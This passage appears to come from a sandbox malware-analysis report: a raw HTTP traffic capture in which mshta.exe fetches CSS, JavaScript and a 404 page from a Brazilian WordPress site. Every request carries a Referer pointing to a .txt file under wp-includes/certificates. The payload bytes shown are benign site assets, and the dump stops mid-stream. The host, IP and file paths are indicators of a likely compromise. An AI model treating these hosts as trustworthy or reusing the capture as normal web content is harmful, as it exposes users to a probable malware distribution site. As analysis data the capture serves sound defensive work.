                                        Aug 16, 2022 10:48:50.175664902 CEST940INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 5f 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 0a 63 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 63 2e 65 6c 61 73 74 69 73 6c 69 64 65 2e 64 65 66 61 75 6c 74 73 2c
                                        Data Ascii: .prototype={_init:function(a){this.options=c.extend(!0,{},c.elastislide.defaults,a);this.$slider=this.$el.find("ul");this.$items=this.$slider.children("li");this.itemsCount=this.$items.length;this.$esCarousel=this.$slider.parent();this._valid
                                        Aug 16, 2022 10:48:50.175703049 CEST942INData Raw: 2c 5f 73 65 74 43 75 72 72 65 6e 74 56 61 6c 75 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 74 65 6d 57 3d 74 68 69 73 2e 24 69 74 65 6d 73 2e 6f 75 74 65 72 57 69 64 74 68 28 21 30 29 3b 74 68 69 73 2e 73 6c 69 64 65 72 57 3d 74
                                        Data Ascii: ,_setCurrentValues:function(){this.itemW=this.$items.outerWidth(!0);this.sliderW=this.itemW*this.itemsCount;this.visibleWidth=this.$esCarousel.width();this.fitCount=Math.floor(this.visibleWidth/this.itemW)},_addControls:function(){this.$navNex
                                        Aug 16, 2022 10:48:50.175744057 CEST943INData Raw: 74 68 69 73 2e 24 69 74 65 6d 73 2e 62 69 6e 64 28 22 63 6c 69 63 6b 2e 65 6c 61 73 74 69 73 6c 69 64 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 43 6c 69 63 6b 28 63 28 74 68 69 73 29 29 7d 29 3b 61 2e 24 73 6c
                                        Data Ascii: this.$items.bind("click.elastislide",function(){a.options.onClick(c(this))});a.$slider.touchwipe({wipeLeft:function(){a._slide("right")},wipeRight:function(){a._slide("left")}})},_slide:function(a,b,g,j){if(this.$slider.is(":animated"))return!
                                        Aug 16, 2022 10:48:50.175782919 CEST945INData Raw: 2e 6d 61 72 67 69 6e 3f 74 68 69 73 2e 5f 74 6f 67 67 6c 65 43 6f 6e 74 72 6f 6c 73 28 22 72 69 67 68 74 22 2c 31 29 3a 74 68 69 73 2e 5f 74 6f 67 67 6c 65 43 6f 6e 74 72 6f 6c 73 28 22 72 69 67 68 74 22 2c 2d 31 29 3b 63 2e 66 6e 2e 61 70 70 6c
                                        Data Ascii: .margin?this._toggleControls("right",1):this._toggleControls("right",-1);c.fn.applyStyle=g===l?c.fn.animate:c.fn.css;this.$slider.applyStyle({marginLeft:b},c.extend(!0,[],{duration:this.options.speed,easing:this.options.easing,complete:functi
                                        Aug 16, 2022 10:48:50.179032087 CEST945OUTGET /wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:51.279915094 CEST951INHTTP/1.1 404 Not Found
                                        Date: Tue, 16 Aug 2022 08:48:50 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"
                                        Content-Type: text/html; charset=UTF-8
                                        X-Varnish: 22495278
                                        Age: 0
                                        Via: 1.1 varnish-v4
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Data Raw: 30 30 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74
                                        Data Ascii: 00104f<!DOCTYPE html>...[if lt IE 7 ]><html class="ie ie6" lang="pt-BR"> <![endif]-->...[if IE 7 ]><html class="ie ie7" lang="pt-BR"> <![endif]-->...[if IE 8 ]><html class="ie ie8" lang="pt-BR"> <![endif]-->...[if IE 9 ]><html class="ie ie9" lang="pt-BR"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html lang="pt-BR"> ...<![endif]--><head><title>Error 404 Not Found | Facex</title><meta name="description" content=" &raquo; Pgina no encontrada | Facex Comrcio Exterior Ltda." /><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="profile" href="//gmpg.org/xfn/11" /><link rel="icon" href="http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico" type="image/x-icon" /><link rel="pingback" href="http://facextrade.com.br/xmlrpc.php" /><link rel="alternate" type="application/rss+xml" title="Facex" href="https://facextrade.com.br/feed/" /><link rel="alt
                                        Aug 16, 2022 10:48:51.279943943 CEST953INData Raw: 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f
                                        Data Ascii: ernate" type="application/atom+xml" title="Facex" href="https://facextrade.com.br/feed/atom/" /><link rel="stylesheet" type="text/css" media="all" href="http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css" /><
                                        Aug 16, 2022 10:48:51.279963970 CEST954INData Raw: 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 5c 2f 77 70 2d 69 6e 63 6c 75
                                        Data Ascii: g\/","svgExt":".svg","source":{"concatemoji":"http:\/\/facextrade.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.20"}};!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var
                                        Aug 16, 2022 10:48:51.279987097 CEST954INData Raw: 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31
                                        Data Ascii: erythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1
                                        Aug 16, 2022 10:48:51.282388926 CEST956INData Raw: 30 30 31 30 31 64 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72
                                        Data Ascii: 00101d<style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1
                                        Aug 16, 2022 10:48:51.282411098 CEST957INData Raw: 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69
                                        Data Ascii: ont-awesome.css?ver=3.2.1' type='text/css' media='all' /><link rel='stylesheet' id='cherry-plugin-css' href='http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1' type='text/css' media='all' />
                                        Aug 16, 2022 10:48:51.282430887 CEST959INData Raw: 2e 63 73 73 3f 76 65 72 3d 31 2e 30 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 67 78 2d 6c 6f 67 6f
                                        Data Ascii: .css?ver=1.0.0' type='text/css' media='all' /><link rel='stylesheet' id='lgx-logo-slider-animate-css' href='http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20' type='text/css' media='


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        23192.168.2.2249199187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:51.510687113 CEST999OUTGET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:51.729427099 CEST1009INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:53 GMT
                                        Server: Apache
                                        ETag: "a53047-101d2-58592d3578140"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:01 GMT
                                        Content-Length: 66002
                                        Content-Type: text/css
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 21534566 23795415
                                        Age: 58
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 62 6f 64 79 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 20 7d 0a 2e 69 65 38 20 62 6f 64 79 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 39 38 30 70 78 3b 20 7d 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 09 62 6f 64 79 2e 63 68 65 72 72 79 2d 66 69 78 65 64 2d 6c 61 79 6f 75 74 20 7b 0a 09 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 09 62 6f 64 79 2e 63 68 65 72 72 79 2d 66 69 78 65 64 2d 6c 61 79 6f 75 74 20 2e 68 65 61 64 65 72 2c 20 62 6f 64 79 2e 63 68 65 72 72 79 2d 66 69 78 65 64 2d 6c 61 79 6f 75 74 20 2e 63 6f 6e 74 65 6e 74 2d 68 6f 6c 64 65 72 2c 20 62 6f 64 79 2e 63 68 65 72 72 79 2d 66 69 78 65 64 2d 6c 61 79 6f 75 74 20 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 0a 09 7d 0a 7d 0a 62 6f 64 79 5b 63 6c 61 73 73 2a 3d 22 73 70 61 6e 22 5d 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 3b 0a 09 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 0a 09 6d 69 6e 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 69 6e 68 65 72 69 74 3b 0a 7d 0a 61 20 7b 20 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 20 7d 0a 61 3a 66 6f 63 75 73 20 7b 20 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 20 7d 0a 2e 6d 61 69 6e 2d 68 6f 6c 64 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 31 3b 0a 7d 0a 2e 63 68 65 72 72 79 2d 66 69 78 65 64 2d 6c 61 79 6f 75 74 20 2e 6d 61 69 6e 2d 68 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 39 38 30 70 78 3b 0a 09 77 69 64 74 68 3a 61 75 74 6f 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 66 61 66 61 3b 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 20 7b 0a 09 2e 63 68 65 72 72 79 2d 66 69 78 65 64 2d 6c 61 79 6f 75 74 20 2e 6d 61 69 6e 2d 68 6f 6c 64 65 72 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 31 32 31 30 70 78 3b 20 7d 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 37 39 70 78 29 20 7b 0a 09 2e 63 68 65 72 72 79 2d 66 69 78 65 64 2d 6c 61 79 6f 75 74 20 2e 6d 61 69 6e 2d 68 6f 6c 64 65 72 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 37 36 34 70 78 3b 20 7d 0a 7d 0a 2e 68 65 61 64 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 39 39 3b 0a 09 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 44 44 44 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 7d 0a 2e 6c 6f 67 6f 20 7b 0a
                                        Data Ascii: body { position:relative; }.ie8 body { min-width:980px; }@media (max-width: 767px) {body.cherry-fixed-layout {padding-left:0 !important;padding-right:0 !important;}}@media (max-width: 767px) {body.cherry-fixed-layout .header, body.cherry-fixed-layout .content-holder, body.cherry-fixed-layout .footer {padding-left:20px;padding-right:20px;}}body[class*="span"] {position:static;float:none;min-height:inherit;margin-left:inherit;}a { outline:none; }a:focus { outline:none; }.main-holder {position:relative;z-index:1;}.cherry-fixed-layout .main-holder {margin:0 auto;max-width:980px;width:auto;background:#fafafa;}@media (min-width: 1200px) {.cherry-fixed-layout .main-holder { max-width:1210px; }}@media (min-width: 768px) and (max-width: 979px) {.cherry-fixed-layout .main-holder { max-width:764px; }}.header {position:relative;z-index:99;padding:30px 0;border-bottom:1px solid #DDD;background-color:#eee;}.logo {
                                        Aug 16, 2022 10:48:51.729470968 CEST1010INData Raw: 09 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 39 39 3b 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 37 39 70 78
                                        Data Ascii: position:relative;z-index:99;}@media (min-width: 768px) and (max-width: 979px) {.logo { width:60%; }}.logo_h__txt { margin:0; }.logo_link {color:#049cdb;text-decoration:none;}.logo_link:hover { text-decoration:none; }.logo_tag
                                        Aug 16, 2022 10:48:51.729511976 CEST1012INData Raw: 3e 20 6c 69 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 64 64 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 66 2d 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 61 20 7b 0a 09 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31
                                        Data Ascii: > li {background:#ddd;text-align:center;}.sf-menu > li > a {padding:10px 12px;border-top:1px solid #DDD;border-left:1px solid #fff;color:#13a;text-decoration:none;}.sf-menu li .desc {display:block;font-size:0.9em;}.sf-m
                                        Aug 16, 2022 10:48:51.729549885 CEST1013INData Raw: 69 63 61 74 6f 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 20 7d 0a 2e 73 66 2d 6d 65 6e 75 20 75 6c 20 61 3a 66 6f 63 75 73 20 3e 20 2e 73 66 2d 73 75 62 2d 69 6e 64 69 63 61 74 6f 72 2c 20 2e 73 66 2d 6d
                                        Data Ascii: icator { background-position:0 0; }.sf-menu ul a:focus > .sf-sub-indicator, .sf-menu ul a:hover > .sf-sub-indicator, .sf-menu ul a:active > .sf-sub-indicator, .sf-menu ul li:hover > a > .sf-sub-indicator, .sf-menu ul li.sfHover > a > .sf-sub-
                                        Aug 16, 2022 10:48:51.729588985 CEST1014INData Raw: 6c 6f 61 64 65 72 20 7b 0a 09 7a 2d 69 6e 64 65 78 3a 30 3b 0a 09 74 6f 70 3a 35 30 25 3b 0a 09 6c 65 66 74 3a 35 30 25 3b 0a 09 6d 61 72 67 69 6e 3a 2d 31 38 70 78 20 30 20 30 20 2d 31 38 70 78 3b 0a 09 77 69 64 74 68 3a 33 36 70 78 3b 0a 09 68
                                        Data Ascii: loader {z-index:0;top:50%;left:50%;margin:-18px 0 0 -18px;width:36px;height:36px;position:absolute;}.content-holder {position:relative;z-index:1;padding-bottom:50px;}#content { padding-top:40px; }#content.left {posit
                                        Aug 16, 2022 10:48:51.729629040 CEST1016INData Raw: 3b 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 0a 7d 0a 2e 74 65 73 74
                                        Data Ascii: ;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;}.testimonial_bq {margin:0;padding:0;border:none;}.testimonial_content {overflow:hidden;background:url(../images/quotes.png) no-repeat 0 0;}@media (min-w
                                        Aug 16, 2022 10:48:51.729666948 CEST1017INData Raw: 69 6e 3a 30 20 30 20 32 65 6d 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 31 65 6d 20 30 3b 0a 09 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 09 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 44 44 44 3b 0a 09 62 6f 72 64 65 72 2d 62 6f
                                        Data Ascii: in:0 0 2em 0;padding:1em 0;border:none;border-top:1px solid #DDD;border-bottom:1px solid #DDD;}.portfolio-meta-list li {margin:.5em 0 0 0;padding:0;border:none;background:none;list-style-type:none;text-transform:none;}.
                                        Aug 16, 2022 10:48:51.729707003 CEST1019INData Raw: 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 62 6c 61 63 6b 2d 6f 70 61 63 69 74 79 2d 36 30 2e 70 6e 67 29 3b 0a 7d 0a 2e 7a 6f 6f 6d 2d 69 63 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65
                                        Data Ascii: ound:url(../images/black-opacity-60.png);}.zoom-icon:before {position:absolute;top:50%;left:50%;display:block;margin:-13px 0 0 -13px;width:25px;height:26px;background:url(../images/magnify-alt.png) 50% 50% no-repeat;content
                                        Aug 16, 2022 10:48:51.729747057 CEST1020INData Raw: 72 61 62 6c 65 2d 70 6f 72 74 66 6f 6c 69 6f 20 2e 69 6d 61 67 65 2d 77 72 61 70 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0a 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e
                                        Data Ascii: rable-portfolio .image-wrap {position:relative;display:block;overflow:hidden;}.filterable-portfolio .image-wrap:before {top:50%;left:50%;margin:-16px 0 0 -16px;z-index:-1;}.filterable-portfolio .folio_loader {top:50%;left
                                        Aug 16, 2022 10:48:51.729784012 CEST1022INData Raw: 20 65 61 73 65 3b 0a 7d 0a 2e 76 69 64 65 6f 5f 70 72 65 76 69 65 77 20 68 34 20 7b 0a 09 70 61 64 64 69 6e 67 3a 30 20 30 20 37 70 78 20 35 70 78 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 44 44 44 3b 0a
                                        Data Ascii: ease;}.video_preview h4 {padding:0 0 7px 5px;border-bottom:1px solid #DDD;}.video_preview .post_author {float:left;padding:0 0 5px 5px;}.video_preview .post_date {float:right;padding:0 5px 5px 0;}.isotope-item { z-index:2;
                                        Aug 16, 2022 10:48:51.945316076 CEST1037INData Raw: 6f 6c 6f 72 3a 23 46 41 46 41 46 41 3b 0a 7d 0a 2e 70 6f 73 74 2d 61 75 74 68 6f 72 5f 68 20 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 20 7d 0a 2e 70 6f 73 74 2d 61 75 74 68 6f 72 5f 6c 69 6e 6b 20 7b 20 6d 61 72 67 69 6e 2d
                                        Data Ascii: olor:#FAFAFA;}.post-author_h { margin-bottom:20px; }.post-author_link { margin-top:1.5em; }.post-author_gravatar {float:left;margin:0 20px 0 0;}.post-author_gravatar img {padding:5px;border:1px solid #DDD;background:#fff;}.po
                                        Aug 16, 2022 10:48:52.163820982 CEST1120OUTGET /wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:52.377753019 CEST1175INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:09 GMT
                                        Server: Apache
                                        ETag: "a5146a-bbe-5c93d38d9c220"
                                        Last-Modified: Tue, 10 Aug 2021 23:54:27 GMT
                                        Content-Length: 3006
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 21534567 15362807
                                        Age: 43
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0d 0a 0d 0a 20 20 20 20 2f 2a 2a 0d 0a 20 20 20 20 20 2a 20 41 6c 6c 20 6f 66 20 74 68 65 20 63 6f 64 65 20 66 6f 72 20 79 6f 75 72 20 70 75 62 6c 69 63 2d 66 61 63 69 6e 67 20 4a 61 76 61 53 63 72 69 70 74 20 73 6f 75 72 63 65 0d 0a 20 20 20 20 20 2a 20 73 68 6f 75 6c 64 20 72 65 73 69 64 65 20 69 6e 20 74 68 69 73 20 66 69 6c 65 2e 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 4e 6f 74 65 3a 20 49 74 20 68 61 73 20 62 65 65 6e 20 61 73 73 75 6d 65 64 20 79 6f 75 20 77 69 6c 6c 20 77 72 69 74 65 20 6a 51 75 65 72 79 20 63 6f 64 65 20 68 65 72 65 2c 20 73 6f 20 74 68 65 0d 0a 20 20 20 20 20 2a 20 24 20 66 75 6e 63 74 69 6f 6e 20 72 65 66 65 72 65 6e 63 65 20 68 61 73 20 62 65 65 6e 20 70 72 65 70 61 72 65 64 20 66 6f 72 20 75 73 61 67 65 20 77 69 74 68 69 6e 20 